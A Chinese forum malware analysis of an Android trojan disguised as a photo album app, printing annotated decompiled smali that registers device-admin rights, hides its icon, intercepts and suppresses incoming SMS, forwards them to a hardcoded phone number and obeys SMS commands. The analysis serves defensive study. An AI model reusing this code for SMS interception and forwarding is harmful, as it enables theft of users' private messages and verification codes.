好友
阅读权限30
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
【木马名称】: 我的相册
【包名】:sada.rlnihao.testrlnihao
【分析工具】: APK改之理
【反编译】: 在dex中插入无效代码在一从来不调用的类上,造成无法二次打包和无法转化成java代码
【木马特点】: 监听截获收件信息,并可控制手机
随着移动互联网的迅速兴起,手机移动支付呈现井喷式发展。然而移动支付在便利人们生活的同时,也面临着越来越多的风险。近日xxshenqi出现,算是又给android移动安全又掀起风波。我想接下来一段时间将会有大量的类似xxshenqi的变种,这也给我们带来挑战和学习机会,同时带来的好处就是给小白用户做了个提醒,让他们感觉到自己的手机是需要保护。前天晚上在某一qq群里,冒出一个名叫“我的相册”,第一反应这就是一个马儿,当然若是一个马儿能找到它的源头是最好的,如电话号码或邮箱信息等,使用apk改之理进行反编译,发现没法转java代码,那就看smali吧,在二次打包时发现
原来是因为在无用类中插入了无效字节码使逆向工具无能,由于大部分逆向工具都是线性读取字节码并解析的,当遇到无效字节是,就会引起反汇编工具字节码解析失败。我去又遇到这个问题,真不知道怎么去处理,先看smali分析吧
代码树形结构: 木马整个的运作流程:
详细分析:
首先我们查看他的AndroidManifest文件,查看它具有哪些权限,和它的入口在哪
理清了他的能力和入口接下来我们就依依来分析
入口一MainActivity分析
启动SmsServer,调用ShareUtil.getFlag()获取Flag是否为”true”并且调用SmsUtil.compareDate()判断当前的时间否是”2014.8.31之后”,就通过短信发送” Install Success!”给木马作者. 看来这是一变种木马啊,还很新的。
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 | invoke-direct {v1}, Landroid/content/Intent;-><init>()V
#Intent intent2 = new Intent();
.line 22
.local v1, "intent2":Landroid/content/Intent;
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
move-result-object v5
#Content v5 = this.getApplicationContext();
const-class v6, Lsada/nihao/testnihao/SmsService;
invoke-virtual {v1, v5, v6}, Landroid/content/Intent;->setClass(Landroid/content/Context;Ljava/lang/Class;)Landroid/content/Intent;
#intent2.setClass(getApplicationContext(), SmsService.class);
.line 23
invoke-virtual {p0, v1}, Lsada/nihao/testnihao/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
#MainActivity.startService(intent2);
.line 26
:try_start_0
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
move-result-object v5
invoke-static {v5}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
move-result-object v4
#ShareUtil su = ShareUtil.getInstance(getApplicationContext());
.line 27
.local v4, "su":Lsada/nihao/testnihao/ShareUtil;
const-string v5, ""
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getFlag()Ljava/lang/String;
move-result-object v6
#String strFlag = su.getFlag(); 判断Flag 是否为“”;
invoke-virtual {v5, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v5
#若flag不是“” 跳到cond_1标签执行
if-eqz v5, :cond_1
.line 28
invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
#调用SmsUtil.compareDate() 判断当前时间是不是在"2014-08-31 23:00:00"之前
move-result v5
|
检测LockRec组件是否具有系统权限,若不是则将LockRec组件注册成系统管理员权限,然后调用 PackageManager().setCompoentEnabledSetting(getComponentName(),2,1);隐藏图标
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 | const-string v5, "device_policy"
invoke-virtual {p0, v5}, Lsada/nihao/testnihao/MainActivity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
move-result-object v5
check-cast v5, Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager这是设备管理主类,通过他可以实现屏幕锁定,屏幕亮度调节,出厂设置等功能
iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#获取安全管理服务 this.policyManager = this.getSystemService("device_police");
.line 38
new-instance v5, Landroid/content/ComponentName;
const-class v6, Lsada/nihao/testnihao/LockRec;
invoke-direct {v5, p0, v6}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
#ComponentName com = new ComponentName(this.content, LockRec.class);
iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#this.componentName = com;
.line 39
iget-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager v5 = this.policyManager;
iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#ComponentName v6 = this.componentName;
invoke-virtual {v5, v6}, Landroid/app/admin/DevicePolicyManager;->isAdminActive(Landroid/content/ComponentName;)Z
#boolean bret = v5.isAdminActive(v6); // 判断LockRec组件是否有系统管理员的权限
move-result v5
if-nez v5, :cond_2
#跳向cond_2标签,表示LockRec组件已经具备系统管理员权限的
########################################################################################################################
#接下来将LockRec组件添加系统管理员权限
.line 41
new-instance v2, Landroid/content/Intent;
const-string v5, "android.app.action.ADD_DEVICE_ADMIN"
invoke-direct {v2, v5}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
#Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
.line 42
.local v2, "localIntent":Landroid/content/Intent;
const-string v5, "android.app.extra.DEVICE_ADMIN"
iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
#指定给LockRec组件授予系统权限 localIntent.putExtra("android.app.extra.DEVICE_ADMIN", componentName);
.line 43
const-string v5, "android.app.extra.ADD_EXPLANATION"
const-string v6, "\u8bbe\u5907\u7ba1\u7406\u5668"
#String v6 = "设备管理器"
invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
.line 44
invoke-virtual {p0, v2}, Lsada/nihao/testnihao/MainActivity;->startActivity(Landroid/content/Intent;)V
#this.startActivity(localIntent);
.line 51
.end local v2 # "localIntent":Landroid/content/Intent;
:cond_2
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getPackageManager()Landroid/content/pm/PackageManager;
move-result-object v3
#PackageManager p = this.getPackManager();
.line 52
.local v3, "p":Landroid/content/pm/PackageManager;
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getComponentName()Landroid/content/ComponentName;
move-result-object v5
#ComponentName v5 = getComponentName();
const/4 v6, 0x2
const/4 v7, 0x1
invoke-virtual {v3, v5, v6, v7}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
#隐藏图标 PackageManager().setCompoentEnabledSetting(getComponentName(),2,1);
.line 53
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->finish()V
|
LockRec是神马东西喃? 我们可以进入AndroidManifest.xml文件查看
[Asm] 纯文本查看 复制代码 1 2 3 4 5 6 | <!--屏幕锁屏或出厂设置,密码更换Recevice 可以通过查看android:resource指定的xml文件查看-->
<receiver android:description="@string/str" android:label="System 设备管理器" android:name="sada.nihao.testnihao.LockRec" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/lock_screen"/>
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
</intent-filter>
|
其实这就是为了调用DevicePolicyManager 设备安全管理服务去干事,具体干什么是,我们可以通过上面代码中 android:resource标签指定的lock_screen文件查看:
[Asm] 纯文本查看 复制代码 1 2 3 4 5 6 7 8 | <?xml version="1.0" encoding="utf-8"?>
<device-admin
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-policies>
<--!force-lock设备自动锁屏-->
<force-lock />
</uses-policies>
</device-admin>
|
原来木马要干锁屏的事
入口二监听自启动广播
启动了一个名叫"WatchDogService"服务
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 | new-instance v0, Landroid/content/Intent;
const-class v1, Lsada/nihao/testnihao/SmsService;
invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
.line 15
.local v0, "WatchDogService":Landroid/content/Intent;
const/high16 v1, 0x10000000
invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
.line 16
invoke-virtual {p1, v0}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
|
服务入口函数OnCreate()
1.注册SmsObServer类,它是继承ContentObServer类,目的是观察特定Uri引起的数据库变化,这个木马对短信收件箱做了监视.
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | .line 27
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getContentResolver()Landroid/content/ContentResolver;
move-result-object v1
.line 28
.local v1, "resolver":Landroid/content/ContentResolver;
new-instance v2, Lsada/nihao/testnihao/SmsObserver;
#resolver = this.getContentResolver(); 获取内容解析器
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getApplicationContext()Landroid/content/Context;
move-result-object v3
new-instance v4, Lsada/nihao/testnihao/SmsHandler;
invoke-direct {v4, p0}, Lsada/nihao/testnihao/SmsHandler;-><init>(Landroid/content/Context;)V
invoke-direct {v2, v3, v1, v4}, Lsada/nihao/testnihao/SmsObserver;-><init>(Landroid/content/Context;Landroid/content/ContentResolver;Lsada/nihao/testnihao/SmsHandler;)V
iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
.line 29
const-string v2, "content://sms"
invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
#Uri uri = Uri.parse("content://sms");
move-result-object v2
const/4 v3, 0x1
iget-object v4, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
invoke-virtual {v1, v2, v3, v4}, Landroid/content/ContentResolver;->registerContentObserver(Landroid/net/Uri;ZLandroid/database/ContentObserver;)V
#注册观察者类,监听短信数据库变化
#resolver.registerContentObserver(uri, ture, new SmsObserver(getApplictionContext(), resolver, new SmsHandler(this)));
|
2.动态注册smsReciver,并设置最大全权限,这样即使手机中存在安全软件,在重启手机后也有可能第一时间拿到短信
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | new-instance v2, Lsada/nihao/testnihao/SmsReceiver;
invoke-direct {v2}, Lsada/nihao/testnihao/SmsReceiver;-><init>()V
##########################################################################################################################
#动态注册短信SmsReciver广播包
#SmsReceiver smsRec = new SmsReceiver();
iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
.line 32
new-instance v0, Landroid/content/IntentFilter;
const-string v2, "android.provider.Telephony.SMS_RECEIVED"
#拦截短信事件
invoke-direct {v0, v2}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
.line 33
.local v0, "intentFilter":Landroid/content/IntentFilter;
const v2, 0x7fffffff
invoke-virtual {v0, v2}, Landroid/content/IntentFilter;->setPriority(I)V
#intentFilter.setPriority(0x7FFFFFFF);
.line 34
iget-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
#SmsReceiver v2 = SmsService.smsReceiver;
new-instance v3, Landroid/content/IntentFilter;
const-string v4, "android.provider.Telephony.SMS_RECEIVED"
invoke-direct {v3, v4}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter2 = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
invoke-virtual {p0, v2, v3}, Lsada/nihao/testnihao/SmsService;->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)Landroid/content/Intent;
#SmsService.registerReceiver(SmsService.smsReceiver, intentFilter2);
#动态注册监听程序自启动的广播包,并调用setPriority()将该广播包设置为最大权限,
.line 35
return-void
.end method
|
此时以注册对收件箱的监控,当有消息发送到中码者手机,或者是木马操控者发送的,将会触发SmsObServer类中的OnChange调用
获取指定短信列值,并将封装成Message 然后触发SmsHandler
[Asm] 纯文本查看 复制代码 001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 | const-string v4, "read=?"
# 需要取得的咧
# String[] PROJECTION= {"_id","address","read","body","thread_id"};
const/4 v5, 0x1
new-array v5, v5, [Ljava/lang/String;
const/4 v6, 0x0
const-string v16, "0"
aput-object v16, v5, v6
const-string v6, "date desc"
invoke-virtual/range {v1 .. v6}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
#获取指定列值的收件箱类容
#Cursor mCursor = resolver.query(Uri.parse("content://sms/inbox"), PROJECTION, "read=?", null, "date desc");
move-result-object v11
.line 32
.local v11, "mCursor":Landroid/database/Cursor;
if-nez v11, :cond_8
#if(mCursor != null)
.line 88
:cond_0
:goto_0
return-void
.line 40
:cond_1
new-instance v8, Lsada/nihao/testnihao/SmsInfo;
invoke-direct {v8}, Lsada/nihao/testnihao/SmsInfo;-><init>()V
#SmsInfo _smsInfo = new SmsInfo();
.line 42
.local v8, "_smsInfo":Lsada/nihao/testnihao/SmsInfo;
const-string v1, "_id"
#int _inIndex = mCursor.getColumnIndex("_id");
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v7
.line 43
.local v7, "_inIndex":I
const/4 v1, -0x1
if-eq v7, v1, :cond_2
.line 45
invoke-interface {v11, v7}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
#SmsInfo.id = mCursor.getString(mCursor.getColumnIndex("_id"));
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->_id:Ljava/lang/String;
.line 48
:cond_2
const-string v1, "thread_id"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v15
.line 49
.local v15, "thread_idIndex":I
const/4 v1, -0x1
if-eq v15, v1, :cond_3
.line 51
invoke-interface {v11, v15}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
#Smsinfo.thread_id = mCursor.getString(mCursor.getColumnIndex("thread_id"));
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->thread_id:Ljava/lang/String;
.line 54
:cond_3
const-string v1, "address"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v9
.line 55
.local v9, "addressIndex":I
const/4 v1, -0x1
if-eq v9, v1, :cond_4
.line 57
invoke-interface {v11, v9}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#Smsinfo.smsAddress = mCursor.getString(mCursor.getColumnIndex("address"));
.line 60
:cond_4
const-string v1, "body"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v10
.line 61
.local v10, "bodyIndex":I
const/4 v1, -0x1
if-eq v10, v1, :cond_5
.line 63
invoke-interface {v11, v10}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
#Smsinfo.smsBody = mCursor.getString(mCursor.getColumnIndex("body"));
.line 66
:cond_5
const-string v1, "read"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v13
.line 67
.local v13, "readIndex":I
const/4 v1, -0x1
if-eq v13, v1, :cond_6
.line 69
invoke-interface {v11, v13}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->read:Ljava/lang/String;
#Smsinfo.read = mCursor.getString(mCursor.getColumnIndex("read"));
.line 71
:cond_6
move-object/from16 v0, p0
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#封装获取到的短信信息 通知Handler
invoke-virtual {v1}, Lsada/nihao/testnihao/SmsHandler;->obtainMessage()Landroid/os/Message;
move-result-object v12
.line 72
.local v12, "msg":Landroid/os/Message;
move-object/from16 v0, p0
#Message msg = new Message();
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->mContext:Landroid/content/Context;
invoke-static {v1}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
move-result-object v14
.line 73
.local v14, "su":Lsada/nihao/testnihao/ShareUtil;
const-string v1, "1"
#ShareUtil su = ShareUtil.getInstance(this.mContext);
invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
move-result-object v2
invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v1
if-nez v1, :cond_7
iget-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#获取是谁发过来的
invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v2
invoke-virtual {v1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
move-result v1
if-eqz v1, :cond_9
.line 74
:cond_7
const/4 v1, 0x2
iput v1, v8, Lsada/nihao/testnihao/SmsInfo;->action:I
.line 78
:goto_1
iput-object v8, v12, Landroid/os/Message;->obj:Ljava/lang/Object;
#msg.obj = item;
.line 79
move-object/from16 v0, p0
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#mHandler.sendMessage(msg);; 触发hander处理偷取的收件箱信息
invoke-virtual {v1, v12}, Lsada/nihao/testnihao/SmsHandler;->sendMessage(Landroid/os/Message;)Z
|
在SmsHandler类中
1.判断发送者是否是木马作者的手机号,如是进入控制手机流程
2.普通号码发送的,将其短信装给自己
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 | .line 41
.local v4, "su":Lsada/nihao/testnihao/ShareUtil;
:try_start_0
invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
move-result v6
if-nez v6, :cond_0
.line 42
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#String v6 = SmsInfo.smsAddress; 获取发信者手机号码
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
#木马作者 手机号码
move-result-object v7
invoke-virtual {v6, v7}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
#判断本次接收到的短信是不是木马编写者
move-result v6
#v6 不为零表示木马作者发送的,这样就达到控制手机的目的
if-eqz v6, :cond_2
###########################################################################################################################################################################
#木马作者控制手机部分代码分析
.line 43
new-instance v2, Lsada/nihao/testnihao/SMSEntity;
invoke-direct {v2}, Lsada/nihao/testnihao/SMSEntity;-><init>()V
#SMSEntity sms = new SMSEntity();
.line 44
.local v2, "sms":Lsada/nihao/testnihao/SMSEntity;
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
#sms.smsTitle = SmsInfo.smsAddress;
.line 45
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
#sms.smsContent = SmsInfo.smsBody;
.line 46
iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
invoke-static {v6, v2}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#SmsUtil.parseStr(this,mcontext, sms);
:try_end_0
.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
move-result-object v7
invoke-virtual {v6, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v6
if-eqz v6, :cond_0
.line 49
const-string v6, "\u6570\u636e\u5e93\u53d1\u9001"
#数据库发送
const-string v7, ""
#将用户接收到的短信转发给木马作者
invoke-static {v6, v7}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
.line 50
iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v7
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
move-result-object v8
new-instance v9, Ljava/lang/StringBuilder;
iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
invoke-static {v10}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
move-result-object v10
invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v9
invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v9
invoke-static {v6, v7, v8, v9}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Lj
|
木马作者的信息以及短息指令的抽取,是封装在Const类里面的
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | const/4 v1, 0x0
[b] const-string v2, "13601574293"[/b]
aput-object v2, v0, v1
#String v0[0] = "13601574293";
const/4 v1, 0x1
const-string v2, ""
aput-object v2, v0, v1
#String v0[1] = "";
sput-object v0, Lsada/nihao/testnihao/Const;->nums:[Ljava/lang/String;
#Const.nums = v0;
.line 108
const-string v0, "#T"
sput-object v0, Lsada/nihao/testnihao/Const;->transpond:Ljava/lang/String;
#Const.transpond = "#T"
.line 109
const-string v0, "#S"
sput-object v0, Lsada/nihao/testnihao/Const;->switch1:Ljava/lang/String;
#Const.transpond = "#S";
.line 110
const-string v0, "#C"
sput-object v0, Lsada/nihao/testnihao/Const;->change:Ljava/lang/String;
.line 111
const-string v0, "SHA_PRE"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PRE:Ljava/lang/String;
#Const.SHA_PRE = "SHA_PRE";
.line 112
const-string v0, "SHARE_FLAG"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_FLAG:Ljava/lang/String;
#Const.SHA_FLAG = "SHARE_FLAG";
.line 113
const-string v0, "SHA_PHO"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHO:Ljava/lang/String;
.line 114
const-string v0, "SHARE_PHONE1"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHONE1:Ljava/lang/String;
.line 115
const-string v0, "SHARE_SWITCH"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_SWITCH:Ljava/lang/String;
return-void
|
入口三短信广播监听
[Asm] 纯文本查看 复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 | .line 28
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsReceiver;->abortBroadcast()V
#SmsReceiver.abortBroadcast()截断短信广播包往下流
.line 29
invoke-static {p1, v1}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#进入SmsUtil类的paresStr函数,会对短信发送者进行识别。
.line 33
invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v3
invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
move-result-object v4
new-instance v5, Ljava/lang/StringBuilder;
iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
invoke-static {v6}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
move-result-object v6
invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v5
invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v5
将短信转给木马作者
invoke-static {p1, v3, v4, v5}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Lja
|
从三个入口算是比较清楚的把这个木马搞定了,可是通过在无用类中插入无效字节码使逆向工具无能,这种手法小菜真的不知如何应对,还望和大家交流学习
测试发现360手机卫士和腾讯管家可以准确查杀,而百度手机卫士还不能查杀.................
|
免费评分
-
查看全部评分
|
[复制链接]
发表于 2014-8-8 20:04
|
发表于 2014-8-8 22:57
